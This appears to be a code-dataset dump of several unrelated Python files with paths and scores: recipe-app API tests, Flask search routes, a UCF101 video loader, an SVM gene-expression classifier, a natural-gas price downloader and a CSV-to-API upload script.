header = {'Authorization': f'Bearer {user3.access_token}'}
payload = {'step_number': 3, 'description': 'Boil over stove.'}
response = requests.put(f'{URL}/recipes/{recipe_data["recipe_id"]}/steps', headers=header, json=payload)
data = response.json()
self.matchDict(data, recipe_id=recipe_data["recipe_id"], **payload)
# Get a recipe steps
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}/steps', headers=header, json=payload)
data = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(data), 3)
# Add recipe images
header = {'Authorization': f'Bearer {user3.access_token}'}
test_images = []
with open('tests/test1.png', 'rb') as image_file:
test_images.append(('images', image_file.read()))
with open('tests/test2.png', 'rb') as image_file:
test_images.append(('images', image_file.read()))
with open('tests/test3.png', 'rb') as image_file:
test_images.append(('images', image_file.read()))
response = requests.put(f'{URL}/recipes/{recipe_data["recipe_id"]}/images', headers=header, files=test_images)
# Get recipe images
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.post(f'{URL}/recipes/{recipe_data["recipe_id"]}/images', headers=header)
self.assertEqual(response.status_code, 200)
with open('tests/recipe_images.zip', "wb") as file:
file.write(response.content)
# Get recipe data with icons stuff
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header)
data = response.json()
# User like recipe
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.post(f'{URL}/recipes/{recipe_data["recipe_id"]}/likes/{user1.user_id}', headers=header)
self.assertEqual(response.status_code, 201)
# Another user like recipe
header = {'Authorization': f'Bearer {user2.access_token}'}
response = requests.post(f'{URL}/recipes/{recipe_data["recipe_id"]}/likes/{user2.user_id}', headers=header)
self.assertEqual(response.status_code, 201)
# Get user likes
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/recipes/likes', headers=header)
like_data = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(like_data), 1)
# Get recipe likes
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}/likes', headers=header)
like_data = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(like_data), 2)
# User unlike recipe
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.delete(f'{URL}/recipes/{recipe_data["recipe_id"]}/likes/{user1.user_id}', headers=header)
self.assertEqual(response.status_code, 204)
# User doesn't have likes
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/recipes/likes', headers=header)
like_data = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(like_data), 0)
# Get user stats
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.get(f'{URL}/users/{user3.user_id}/stats', headers=header)
print(response.json())
self.assertEqual(response.status_code, 200)
# Get the amazing discover page
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/discover', headers=header)
discover_data = response.json()
print(discover_data)
# Delete recipe
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.delete(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header)
self.assertEqual(response.status_code, 204)
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header)
self.assertEqual(response.status_code, 404)
# Upload profile image
header = {'Authorization': f'Bearer {user2.access_token}'}
with open('tests/test0.png', 'rb') as image_file:
test_image = {'image': image_file.read()}
response = requests.put(f'{URL}/users/{user2.user_id}/profileimage', headers=header, files=test_image)
self.assertEqual(response.status_code, 200)
# Download profile image
header = {'Authorization': f'Bearer {user2.access_token}'}
response = requests.get(f'{URL}/users/{user2.user_id}/profileimage', headers=header)
self.assertEqual(response.status_code, 200)
with open('tests/downloaded_test.png', "wb") as file:
file.write(response.content)
# Delete profile image
header = {'Authorization': f'Bearer {user2.access_token}'}
response = requests.delete(f'{URL}/users/{user2.user_id}/profileimage', headers=header)
self.assertEqual(response.status_code, 200)
def matchDict(self, actual, **expected):
    """Assert that *actual* contains every key/value pair passed as kwargs."""
    for field in expected:
        self.assertEqual(actual.get(field), expected[field])
if __name__ == '__main__':
unittest.main() | 0.479504 | 0.182717 |
from flask import render_template, request, Blueprint
from randomarchive.main.forms import SearchForm
from randomarchive.models import User
from randomarchive import db, mysql
from randomarchive.config import Config
import MySQLdb.cursors
main = Blueprint('main', __name__)
@main.route("/")
@main.route("/home")
def home():
page = request.args.get('page', 1, type=int)
cur = mysql.connection.cursor()
sql_select_query = """SELECT * FROM post ORDER BY date_posted DESC"""
cur.execute(sql_select_query)
results = cur.fetchall()
page = 1
page_num = 1
results_per_page = 5
for result in results:
user = User.query.filter_by(id=result['user_id']).first()
result['author.username'] = user.username
result['author.email'] = user.email
result['author.image_file'] = 'https://storage.googleapis.com/' + Config.GCS_BUCKET_NAME + '/' + user.image_file + '?cloudshell=true&orgonly=true&supportedpurview=organizationId'
if results_per_page == 0:
page_num = page_num + 1
result['page'] = page_num
results_per_page = results_per_page - 1
#print(str(results[0]['title']))
#print(str(page_num))
#print(str(page))
return render_template('home.html', posts=results, pages=page_num+1, page=page)
@main.route("/about")
def about():
architecture_diagram = 'https://storage.googleapis.com/' + Config.GCS_BUCKET_NAME + '/RandomArchive%20Architecture.jpg?cloudshell=true&orgonly=true&supportedpurview=organizationId'
return render_template('about.html', title='About', arch_diagram=architecture_diagram)
@main.route("/search")
def search():
searchterm = request.args['search']
return search_posts(searchterm)
@main.route("/<string:searchterm>")
def search_posts(searchterm):
searchform = SearchForm()
page = request.args.get('page', 1, type=int)
sql_select_query = '''SELECT * FROM post WHERE title LIKE %s OR content LIKE %s OR user_id LIKE %s ORDER BY post.date_posted DESC'''
wild_search = '%' + searchterm + '%'
select_tuple = (wild_search, wild_search, wild_search)
cur = mysql.connection.cursor()
cur.execute(sql_select_query, select_tuple)
results = cur.fetchall()
page_num = 1
results_per_page = 5
for result in results:
user = User.query.filter_by(id=result['user_id']).first()
result['author.username'] = user.username
result['author.email'] = user.email
result['author.image_file'] = 'https://storage.googleapis.com/' + Config.GCS_BUCKET_NAME + '/' + user.image_file + '?cloudshell=true&orgonly=true&supportedpurview=organizationId'
if results_per_page == 0:
page_num = page_num + 1
result['page'] = page_num
results_per_page = results_per_page - 1
return render_template('search_posts.html', posts=results, searchterm=searchterm, pages=page_num+1, page=page, total=len(results)) | randomarchive/main/routes.py | from flask import render_template, request, Blueprint
from randomarchive.main.forms import SearchForm
from randomarchive.models import User
from randomarchive import db, mysql
from randomarchive.config import Config
import MySQLdb.cursors
main = Blueprint('main', __name__)
@main.route("/")
@main.route("/home")
def home():
page = request.args.get('page', 1, type=int)
cur = mysql.connection.cursor()
sql_select_query = """SELECT * FROM post ORDER BY date_posted DESC"""
cur.execute(sql_select_query)
results = cur.fetchall()
page = 1
page_num = 1
results_per_page = 5
for result in results:
user = User.query.filter_by(id=result['user_id']).first()
result['author.username'] = user.username
result['author.email'] = user.email
result['author.image_file'] = 'https://storage.googleapis.com/' + Config.GCS_BUCKET_NAME + '/' + user.image_file + '?cloudshell=true&orgonly=true&supportedpurview=organizationId'
if results_per_page == 0:
page_num = page_num + 1
result['page'] = page_num
results_per_page = results_per_page - 1
#print(str(results[0]['title']))
#print(str(page_num))
#print(str(page))
return render_template('home.html', posts=results, pages=page_num+1, page=page)
@main.route("/about")
def about():
architecture_diagram = 'https://storage.googleapis.com/' + Config.GCS_BUCKET_NAME + '/RandomArchive%20Architecture.jpg?cloudshell=true&orgonly=true&supportedpurview=organizationId'
return render_template('about.html', title='About', arch_diagram=architecture_diagram)
@main.route("/search")
def search():
searchterm = request.args['search']
return search_posts(searchterm)
@main.route("/<string:searchterm>")
def search_posts(searchterm):
searchform = SearchForm()
page = request.args.get('page', 1, type=int)
sql_select_query = '''SELECT * FROM post WHERE title LIKE %s OR content LIKE %s OR user_id LIKE %s ORDER BY post.date_posted DESC'''
wild_search = '%' + searchterm + '%'
select_tuple = (wild_search, wild_search, wild_search)
cur = mysql.connection.cursor()
cur.execute(sql_select_query, select_tuple)
results = cur.fetchall()
page_num = 1
results_per_page = 5
for result in results:
user = User.query.filter_by(id=result['user_id']).first()
result['author.username'] = user.username
result['author.email'] = user.email
result['author.image_file'] = 'https://storage.googleapis.com/' + Config.GCS_BUCKET_NAME + '/' + user.image_file + '?cloudshell=true&orgonly=true&supportedpurview=organizationId'
if results_per_page == 0:
page_num = page_num + 1
result['page'] = page_num
results_per_page = results_per_page - 1
return render_template('search_posts.html', posts=results, searchterm=searchterm, pages=page_num+1, page=page, total=len(results)) | 0.217504 | 0.053034 |
from __future__ import print_function, division
import os
import pandas as pd
from skimage import io, transform
import numpy as np
import random
import matplotlib.pyplot as plt
from torch.utils.data import Dataset, DataLoader
# Ignore warnings
import warnings
warnings.filterwarnings("ignore")
plt.ion() # interactive mode
class UCF101(Dataset):
    """UCF101 Landmarks dataset.

    Serves clips of 16 consecutive RGB frames, shaped (16, 240, 320, 3),
    sampled at a random start offset from pre-extracted JPEG frame folders.
    """
    def __init__(self, info_list, root_dir, transform=None):
        """
        Args:
            info_list (string): Path to the info list file with annotations.
            root_dir (string): Directory with all the video frames.
            transform (callable, optional): Optional transform to be applied
                on a sample.
        """
        self.landmarks_frame = pd.read_csv(info_list, delimiter=' ', header=None)
        self.root_dir = root_dir
        self.transform = transform

    def __len__(self):
        return len(self.landmarks_frame)

    # get (16,240,320,3)
    def __getitem__(self, idx):
        # Column 0 of the info list is the relative video path, column 1 the label.
        video_path = os.path.join(self.root_dir, self.landmarks_frame.iloc[idx, 0])
        video_label = self.landmarks_frame.iloc[idx, 1]
        video_x = self.get_single_video_x(video_path)
        sample = {'video_x': video_x, 'video_label': video_label}
        if self.transform:
            sample = self.transform(sample)
        return sample

    def get_single_video_x(self, video_path):
        # Strip the extension to get the frame-directory name.
        # NOTE(review): splitting on '.' breaks if the path contains other dots,
        # and video_path already includes root_dir, which is joined again below —
        # presumably harmless for the paths used here; confirm.
        slash_rows = video_path.split('.')
        dir_name = slash_rows[0]
        video_jpgs_path = os.path.join(self.root_dir, dir_name)
        # get the random 16 frame
        data = pd.read_csv(os.path.join(video_jpgs_path, 'n_frames'), delimiter=' ', header=None)
        frame_count = data[0][0]
        video_x = np.zeros((16, 240, 320, 3))
        # NOTE(review): randint(1, frame_count - 17) raises ValueError for any
        # video shorter than 18 frames — TODO confirm all clips are long enough.
        image_start = random.randint(1, frame_count - 17)
        image_id = image_start
        for i in range(16):
            # Frames are named image_00001.jpg, image_00002.jpg, ...
            s = "%05d" % image_id
            image_name = 'image_' + s + '.jpg'
            image_path = os.path.join(video_jpgs_path, image_name)
            tmp_image = io.imread(image_path)
            # assumes every frame is exactly 240x320 RGB — TODO confirm
            video_x[i, :, :, :] = tmp_image
            image_id += 1
        return video_x | src/library/utils/datasets/ucf101.py | from __future__ import print_function, division
import os
import pandas as pd
from skimage import io, transform
import numpy as np
import random
import matplotlib.pyplot as plt
from torch.utils.data import Dataset, DataLoader
# Ignore warnings
import warnings
warnings.filterwarnings("ignore")
plt.ion() # interactive mode
class UCF101(Dataset):
    """UCF101 Landmarks dataset.

    Serves clips of 16 consecutive RGB frames, shaped (16, 240, 320, 3),
    sampled at a random start offset from pre-extracted JPEG frame folders.
    """
    def __init__(self, info_list, root_dir, transform=None):
        """
        Args:
            info_list (string): Path to the info list file with annotations.
            root_dir (string): Directory with all the video frames.
            transform (callable, optional): Optional transform to be applied
                on a sample.
        """
        self.landmarks_frame = pd.read_csv(info_list, delimiter=' ', header=None)
        self.root_dir = root_dir
        self.transform = transform

    def __len__(self):
        return len(self.landmarks_frame)

    # get (16,240,320,3)
    def __getitem__(self, idx):
        # Column 0 of the info list is the relative video path, column 1 the label.
        video_path = os.path.join(self.root_dir, self.landmarks_frame.iloc[idx, 0])
        video_label = self.landmarks_frame.iloc[idx, 1]
        video_x = self.get_single_video_x(video_path)
        sample = {'video_x': video_x, 'video_label': video_label}
        if self.transform:
            sample = self.transform(sample)
        return sample

    def get_single_video_x(self, video_path):
        # Strip the extension to get the frame-directory name.
        # NOTE(review): splitting on '.' breaks if the path contains other dots,
        # and video_path already includes root_dir, which is joined again below —
        # presumably harmless for the paths used here; confirm.
        slash_rows = video_path.split('.')
        dir_name = slash_rows[0]
        video_jpgs_path = os.path.join(self.root_dir, dir_name)
        # get the random 16 frame
        data = pd.read_csv(os.path.join(video_jpgs_path, 'n_frames'), delimiter=' ', header=None)
        frame_count = data[0][0]
        video_x = np.zeros((16, 240, 320, 3))
        # NOTE(review): randint(1, frame_count - 17) raises ValueError for any
        # video shorter than 18 frames — TODO confirm all clips are long enough.
        image_start = random.randint(1, frame_count - 17)
        image_id = image_start
        for i in range(16):
            # Frames are named image_00001.jpg, image_00002.jpg, ...
            s = "%05d" % image_id
            image_name = 'image_' + s + '.jpg'
            image_path = os.path.join(video_jpgs_path, image_name)
            tmp_image = io.imread(image_path)
            # assumes every frame is exactly 240x320 RGB — TODO confirm
            video_x[i, :, :, :] = tmp_image
            image_id += 1
        return video_x | 0.692954 | 0.23783
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import sys
import time
from sklearn.pipeline import make_pipeline
from skrebate import ReliefF
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_val_score, train_test_split, LeaveOneOut, KFold, StratifiedKFold
from sklearn import preprocessing
from sklearn.svm import LinearSVC
# filenames = ['alon', 'borovecki', 'burczynski', 'chiaretti', 'chin', 'chowdary', 'christensen', 'golub', 'gordon', 'gravier', 'khan', 'nakayama', 'pomeroy', 'shipp', 'singh', 'sorlie', 'su', 'subramanian', 'sun', 'tian', 'west', 'yeoh']
# CLI: python classify_with_svm.py <dataset-name> <lasso|relieff>
name = sys.argv[1]
# NOTE(review): ``type`` shadows the builtin; consider renaming (e.g. fs_type).
type = sys.argv[2]
features = pd.read_csv('data/' + name + '_inputs.csv', header = None)
labels = pd.read_csv('data/' + name + '_outputs.csv', header = None)
features.fillna(0, inplace = True)
features = np.asarray(features.values)
# Labels are 1-based on disk; shift to 0-based ints.
labels = np.transpose(np.asarray(labels.values.ravel() - 1, dtype=int))
# Scale every feature into [0, 1].
min_max_scaler = preprocessing.MinMaxScaler()
features = min_max_scaler.fit_transform(features)
if type == 'lasso':
    gains = np.asarray(np.loadtxt('features/' + name + '_lasso.txt'))
    indexes = np.where(gains != 0)[0]
else:
    # The lasso selection is loaded first only to learn how many features it
    # kept; the same number of top-ranked ReliefF features is then selected.
    gains = np.asarray(np.loadtxt('features/' + name + '_lasso.txt'))
    indexes = np.where(gains != 0)[0]
    gains = np.asarray(np.loadtxt('features/' + name + '_relieff.txt'))
    indexes = gains.argsort()[-indexes.shape[0]:][::-1]
scores = []
# Leave-one-out cross-validation with a linear SVM on the selected features.
loo = LeaveOneOut()
startTime = time.time()
for train_index, test_index in loo.split(features):
    x_train, x_test = features[train_index], features[test_index]
    y_train, y_test = labels[train_index], labels[test_index]
    X_train = x_train[:, indexes]
    X_test = x_test[:, indexes]
    Y_train = y_train[:]
    Y_test = y_test[:]
    # NOTE(review): batch_size / num_classes / epochs are unused leftovers,
    # presumably from a neural-network variant of this script.
    batch_size = 1
    num_classes = np.max(labels) + 1
    epochs = 50
    X_train = X_train.astype('float32')
    X_test = X_test.astype('float32')
    Y_train = Y_train[:]
    Y_test = Y_test[:]
    clf = LinearSVC(random_state=0)
    clf.fit(X_train, Y_train)
    score = clf.score(X_test, Y_test)
    scores.append(score)
endTime = time.time()
with open('results/' + name + '_svm_' + type + '.txt', 'w') as file:
    file.write('Score: ' + str(np.average(scores)) + '\n')
    file.write('Time: ' + str(endTime - startTime))
    # NOTE(review): close() is redundant inside a ``with`` block.
    file.close()
print('Score: ' + str(np.average(scores)))
print('Time: ' + str(endTime - startTime)) | classify_with_svm.py | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import sys
import time
from sklearn.pipeline import make_pipeline
from skrebate import ReliefF
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_val_score, train_test_split, LeaveOneOut, KFold, StratifiedKFold
from sklearn import preprocessing
from sklearn.svm import LinearSVC
# filenames = ['alon', 'borovecki', 'burczynski', 'chiaretti', 'chin', 'chowdary', 'christensen', 'golub', 'gordon', 'gravier', 'khan', 'nakayama', 'pomeroy', 'shipp', 'singh', 'sorlie', 'su', 'subramanian', 'sun', 'tian', 'west', 'yeoh']
# CLI: python classify_with_svm.py <dataset-name> <lasso|relieff>
name = sys.argv[1]
# NOTE(review): ``type`` shadows the builtin; consider renaming (e.g. fs_type).
type = sys.argv[2]
features = pd.read_csv('data/' + name + '_inputs.csv', header = None)
labels = pd.read_csv('data/' + name + '_outputs.csv', header = None)
features.fillna(0, inplace = True)
features = np.asarray(features.values)
# Labels are 1-based on disk; shift to 0-based ints.
labels = np.transpose(np.asarray(labels.values.ravel() - 1, dtype=int))
# Scale every feature into [0, 1].
min_max_scaler = preprocessing.MinMaxScaler()
features = min_max_scaler.fit_transform(features)
if type == 'lasso':
    gains = np.asarray(np.loadtxt('features/' + name + '_lasso.txt'))
    indexes = np.where(gains != 0)[0]
else:
    # The lasso selection is loaded first only to learn how many features it
    # kept; the same number of top-ranked ReliefF features is then selected.
    gains = np.asarray(np.loadtxt('features/' + name + '_lasso.txt'))
    indexes = np.where(gains != 0)[0]
    gains = np.asarray(np.loadtxt('features/' + name + '_relieff.txt'))
    indexes = gains.argsort()[-indexes.shape[0]:][::-1]
scores = []
# Leave-one-out cross-validation with a linear SVM on the selected features.
loo = LeaveOneOut()
startTime = time.time()
for train_index, test_index in loo.split(features):
    x_train, x_test = features[train_index], features[test_index]
    y_train, y_test = labels[train_index], labels[test_index]
    X_train = x_train[:, indexes]
    X_test = x_test[:, indexes]
    Y_train = y_train[:]
    Y_test = y_test[:]
    # NOTE(review): batch_size / num_classes / epochs are unused leftovers,
    # presumably from a neural-network variant of this script.
    batch_size = 1
    num_classes = np.max(labels) + 1
    epochs = 50
    X_train = X_train.astype('float32')
    X_test = X_test.astype('float32')
    Y_train = Y_train[:]
    Y_test = Y_test[:]
    clf = LinearSVC(random_state=0)
    clf.fit(X_train, Y_train)
    score = clf.score(X_test, Y_test)
    scores.append(score)
endTime = time.time()
with open('results/' + name + '_svm_' + type + '.txt', 'w') as file:
    file.write('Score: ' + str(np.average(scores)) + '\n')
    file.write('Time: ' + str(endTime - startTime))
    # NOTE(review): close() is redundant inside a ``with`` block.
    file.close()
print('Score: ' + str(np.average(scores)))
print('Time: ' + str(endTime - startTime)) | 0.257485 | 0.274478
import pandas as pd
def get_daily_data():
    """Download the daily Henry Hub spot-price history from EIA.

    Returns a DataFrame indexed by date, or None when the download or
    parse fails (the exception is printed rather than raised).
    """
    daily_url = 'https://www.eia.gov/dnav/ng/hist_xls/RNGWHHDd.xls'
    result = None
    try:
        result = pd.read_excel(daily_url, sheet_name='Data 1', index_col=0, header=2)
    except Exception as err:
        print('Exception in get_daily_data')
        print(str(err))
    finally:
        return result
# This is to rename columns and resetting indices for later use
def transform(_df):
    """Move the date index into a 'Date' column and rename the price column."""
    try:
        _df.reset_index(level=0, inplace=True)
        _df.rename(
            columns={
                'Date': 'Date',
                'Henry Hub Natural Gas Spot Price (Dollars per Million Btu)': 'Price',
            },
            inplace=True,
        )
    except Exception as err:
        print('Exception in transform')
        print(str(err))
    finally:
        return _df
# Generate monthly data
def generate_monthly_data(_df):
    """Reduce daily data to one row per month.

    Takes the price of the first working day of each month (usually the 1st,
    otherwise the next available business day). Returns the monthly frame
    with 'Date' as a column; on failure prints the error and returns the
    frame in whatever state it reached.
    """
    try:
        # BUG FIX: previously read the module-level ``df_daily`` instead of
        # the ``_df`` argument, so the function only worked when called from
        # the script's __main__ block.
        _df = _df.set_index('Date', inplace=False)
        _df.index = pd.to_datetime(_df.index)
        # 'BMS' = business month start: first working day of each month.
        _df = _df.resample('BMS').first()
        _df.reset_index(level=0, inplace=True)
    except Exception as err:
        print('Exception in generate_monthly_data')
        print(str(err))
    finally:
        return _df
# Save given dataframe to CSV
def save_csv(_df, file_name='daily.csv'):
    """Write *_df* to *file_name* without the index; errors are printed."""
    try:
        _df.to_csv(file_name, index=False)
    except Exception as err:
        print('Exception in saving CSV file.')
        print(str(err))
    finally:
        return _df
if __name__ == '__main__':
    # Pipeline: download daily data, tidy it, persist the daily CSV, then
    # derive and persist the monthly CSV consumed by daily.html/monthly.html.
    df_daily = None
    df_monthly = None
    print('1/5: Getting the Daily Henry Hub gas prices data from EIA')
    df_daily = get_daily_data()
    print('2/5: Transforming the data')
    df_daily = transform(df_daily)
    print('3/5: Saving Daily Data into CSV file.')
    save_csv(df_daily)
    # NOTE(review): "Data Data" below looks like a typo for "Monthly Data".
    print('4/5: Saving Data Data into CSV file.')
    df_monthly = generate_monthly_data(df_daily)
    print('5/5: Saving Monthly Data into CSV file.')
    save_csv(df_monthly, 'monthly.csv')
    print(
        '\n\nThe processes completed. The resultant daily and monthly data can be seen in graphical format in daily.html and monthly.html respectively.\nIn case CSV file name is changed, you must edit the HTML files.') | process.py | import pandas as pd
def get_daily_data():
    """Download the daily Henry Hub spot-price history from EIA.

    Returns a DataFrame indexed by date, or None when the download or
    parse fails (the exception is printed rather than raised).
    """
    daily_url = 'https://www.eia.gov/dnav/ng/hist_xls/RNGWHHDd.xls'
    result = None
    try:
        result = pd.read_excel(daily_url, sheet_name='Data 1', index_col=0, header=2)
    except Exception as err:
        print('Exception in get_daily_data')
        print(str(err))
    finally:
        return result
# This is to rename columns and resetting indices for later use
def transform(_df):
    """Move the date index into a 'Date' column and rename the price column."""
    try:
        _df.reset_index(level=0, inplace=True)
        _df.rename(
            columns={
                'Date': 'Date',
                'Henry Hub Natural Gas Spot Price (Dollars per Million Btu)': 'Price',
            },
            inplace=True,
        )
    except Exception as err:
        print('Exception in transform')
        print(str(err))
    finally:
        return _df
# Generate monthly data
def generate_monthly_data(_df):
    """Reduce daily data to one row per month.

    Takes the price of the first working day of each month (usually the 1st,
    otherwise the next available business day). Returns the monthly frame
    with 'Date' as a column; on failure prints the error and returns the
    frame in whatever state it reached.
    """
    try:
        # BUG FIX: previously read the module-level ``df_daily`` instead of
        # the ``_df`` argument, so the function only worked when called from
        # the script's __main__ block.
        _df = _df.set_index('Date', inplace=False)
        _df.index = pd.to_datetime(_df.index)
        # 'BMS' = business month start: first working day of each month.
        _df = _df.resample('BMS').first()
        _df.reset_index(level=0, inplace=True)
    except Exception as err:
        print('Exception in generate_monthly_data')
        print(str(err))
    finally:
        return _df
# Save given dataframe to CSV
def save_csv(_df, file_name='daily.csv'):
    """Write *_df* to *file_name* without the index; errors are printed."""
    try:
        _df.to_csv(file_name, index=False)
    except Exception as err:
        print('Exception in saving CSV file.')
        print(str(err))
    finally:
        return _df
if __name__ == '__main__':
    # Pipeline: download daily data, tidy it, persist the daily CSV, then
    # derive and persist the monthly CSV consumed by daily.html/monthly.html.
    df_daily = None
    df_monthly = None
    print('1/5: Getting the Daily Henry Hub gas prices data from EIA')
    df_daily = get_daily_data()
    print('2/5: Transforming the data')
    df_daily = transform(df_daily)
    print('3/5: Saving Daily Data into CSV file.')
    save_csv(df_daily)
    # NOTE(review): "Data Data" below looks like a typo for "Monthly Data".
    print('4/5: Saving Data Data into CSV file.')
    df_monthly = generate_monthly_data(df_daily)
    print('5/5: Saving Monthly Data into CSV file.')
    save_csv(df_monthly, 'monthly.csv')
    print(
        '\n\nThe processes completed. The resultant daily and monthly data can be seen in graphical format in daily.html and monthly.html respectively.\nIn case CSV file name is changed, you must edit the HTML files.') | 0.406862 | 0.351061
import argparse
import csv
import json
from typing import Dict, List, Tuple
import requests
DUPLICATE_ARG_NAME = "duplicate"
def generate_authkey(username: str, password: str, server: str) -> Dict:
    """POST the credentials to *server* and return the decoded JSON payload."""
    print(username)
    credentials = {'username': username, 'password': password}
    response = requests.post(server, json=credentials)
    print(response.text)
    return response.json()
def write_fail_csv(entries: List, path: str):
    """Write the failed rows to *path* as CSV.

    ``newline=''`` is required by the csv module; without it every row is
    followed by a spurious blank line on Windows.
    """
    with open(path, 'w', newline='') as csv_f:
        csv_w = csv.writer(csv_f, delimiter=',')
        csv_w.writerows(entries)
def parse_csv_to_memory(csv_path: str) -> List[List]:
    """Read the whole CSV at *csv_path* into a list of row lists.

    This probably doesn't need to be a function but it's separated for
    testability and to do additional functionality when parsing CSVs.
    """
    # newline='' lets the csv module handle quoted embedded newlines correctly.
    with open(csv_path, newline='') as csv_f:
        csv_r = csv.reader(csv_f, delimiter=',')
        return [row for row in csv_r]
def load_csv_to_db(
    csv_data: List[List], entrymap: Dict, server: str, authkey: Dict,
    dry_run: bool = False
) -> List[List]:
    """Send every data row (header excluded) to the server.

    Returns the rows that were rejected, each extended with the posted
    payload, the response text and the status code.
    """
    failed_entries = []
    for row in csv_data[1:]:
        if not server:
            # No server address given: force a dry run with a placeholder.
            dry_run = True
            server = '0.0.0.0'
        status, text, payload = send_entry(
            server, row, entrymap, dry_run, authkey)
        if status not in {200, 201}:  # STATUS CODE not OK
            row.extend([payload, text, status])
            failed_entries.append(row)
    return failed_entries
def build_entrymap(csv_column_names: List, column_map: Dict) -> Dict:
    """Builds a db column name to csv column index mapping. If no mapping file
    is given, we naively create the mapping using the order of the rows.

    column_map provided should be {csv column name: db column name},
    not including the primary ID.

    The function returns {db column name: csv column index}
    """
    # Naive approach, assumes the csv column names matches the db column names
    db_content_names = csv_column_names[1:]
    if column_map is None:
        return {
            column_name: index
            for index, column_name in enumerate(db_content_names, start=1)
        }
    if len(column_map) != len(db_content_names):
        # BUG FIX: the original warning contained the typo "maping".
        print("WARNING: The db and csv column mapping file provided are "
              "mismatched in length. db column names are: "
              f"\n{db_content_names}\nThe provided column mapping "
              f"generated the following mapping: \n{column_map}")
    # Using mapping provided by user to create the mapping
    db_column_to_index_map = {}
    for csv_column_name, db_column_name in column_map.items():
        if csv_column_name not in db_content_names:
            # BUG FIX: the original warning text was garbled ("This may be
            # warning may be triggered"); rewritten for clarity.
            print(f"WARNING: {csv_column_name} not part of the db column "
                  f"names for values {db_content_names}. This warning may "
                  "be triggered by including the primary key in the "
                  "mapping file; remove that mapping entry to silence it.")
            continue
        db_column_to_index_map[db_column_name] = csv_column_names.index(
            csv_column_name)
    return db_column_to_index_map
def send_entry(
    server: str, entry: List, entrymap: Dict, dry_run: bool, authkey: Dict
) -> Tuple[int, str, Dict]:
    """Build the POST payload for one CSV row and (unless dry_run) submit it.

    Rows flagged in the duplicate column are skipped and reported as OK.
    Returns (status_code, response_text, payload).
    """
    payload = {}
    for db_column, idx in entrymap.items():
        if db_column == DUPLICATE_ARG_NAME:
            # Any value at all in the duplicate column means "skip this row".
            if entry[idx]:
                return 200, None, None
            continue
        payload[db_column] = entry[idx]
    print(payload)
    if dry_run:
        return 200, "Dry run, no response text", payload
    auth_headers = {'Authorization': 'JWT ' + authkey['access_token']}
    response = requests.post(server, json=payload, headers=auth_headers)
    print(response.status_code, response.text)
    return response.status_code, response.text, payload
def main(argv):
    """Drive the import: authenticate, parse the CSV, upload, report failures."""
    authkey = None
    if not argv.dry_run:
        authkey = generate_authkey(
            argv.auth_username, argv.auth_password, argv.auth_api)
    elif not argv.server_address:
        print("\nWARNING: A server address was not provided in args. "
              "Only printing results locally. Use the -h arg if you don't "
              "know what this means.\n")
    else:
        print("\nThis is a dry run. No data will be loaded to server whether "
              "a server_address has been provided or not.\n")
    csv_data = parse_csv_to_memory(argv.csv_path)
    if argv.entrymap_path is not None:
        with open(argv.entrymap_path, "r") as fp:
            column_map = json.load(fp)
        if argv.duplicate_column_name is not None:
            # Route the duplicate-marker column through the sentinel name.
            column_map[argv.duplicate_column_name] = DUPLICATE_ARG_NAME
    else:
        column_map = None
    entrymap = build_entrymap(
        csv_column_names=csv_data[0],
        column_map=column_map)
    failed_entries = load_csv_to_db(
        csv_data=csv_data,
        entrymap=entrymap,
        server=argv.server_address,
        authkey=authkey,
        dry_run=argv.dry_run)
    total_failed_entries = len(failed_entries)
    # BUG FIX: this was ``> 1``, which silently dropped the report (and the
    # failure CSV) whenever exactly one entry failed.
    if total_failed_entries > 0:
        print(
            "\nTHERE WERE {} ENTRIES THAT FAILED TO BE PROCESSED. "
            "PLEASE SEE \"{}\" TO DETERMINE IF THERE'S ANY DATA REMEDIATION "
            "THAT'S NEEDED.\n".format(
                total_failed_entries, argv.fail_csv_path))
        write_fail_csv(failed_entries, argv.fail_csv_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Parse a specifically formatted CSV')
parser.add_argument(
'--csv_path', '-c', dest='csv_path', required=True,
help='the path to the csv file')
parser.add_argument(
'--entrymap_path', '-e', dest='entrymap_path', required=False,
default=None,
help='the path to the JSON mapping file for db column names to csv'
' column names')
parser.add_argument(
'--dry_run', '-d', dest='dry_run', action='store_true',
help='performs a dry run locally when provided with a '
'server_address')
parser.add_argument(
'--fail_csv_path', '-f', dest='fail_csv_path',
default='./failed_entires.csv',
help='the path to drop a csv with failed entries')
parser.add_argument(
'--duplicate_column_name', '-dc', dest='duplicate_column_name',
required=False, default=None,
help='The column name where duplicate is marked and skipped. If there '
'are any values within that column, it will count as a hit.')
parser.add_argument(
'--server', '-s', dest='server_address', required=False,
help='the server address for the results to be uploaded')
parser.add_argument(
'--user', '-u', dest='auth_username', required=True,
help='the username to log in to the api with')
parser.add_argument(
'--pass', '-p', dest='auth_password', required=True,
help='the password to log in to the api with')
parser.add_argument(
'--auth', '-a', dest='auth_api', required=True,
help='the auth api')
args = parser.parse_args()
main(args) | main.py | import argparse
import csv
import json
from typing import Dict, List, Tuple
import requests
DUPLICATE_ARG_NAME = "duplicate"
def generate_authkey(username: str, password: str, server: str) -> Dict:
    """POST the credentials to *server* and return the decoded JSON payload."""
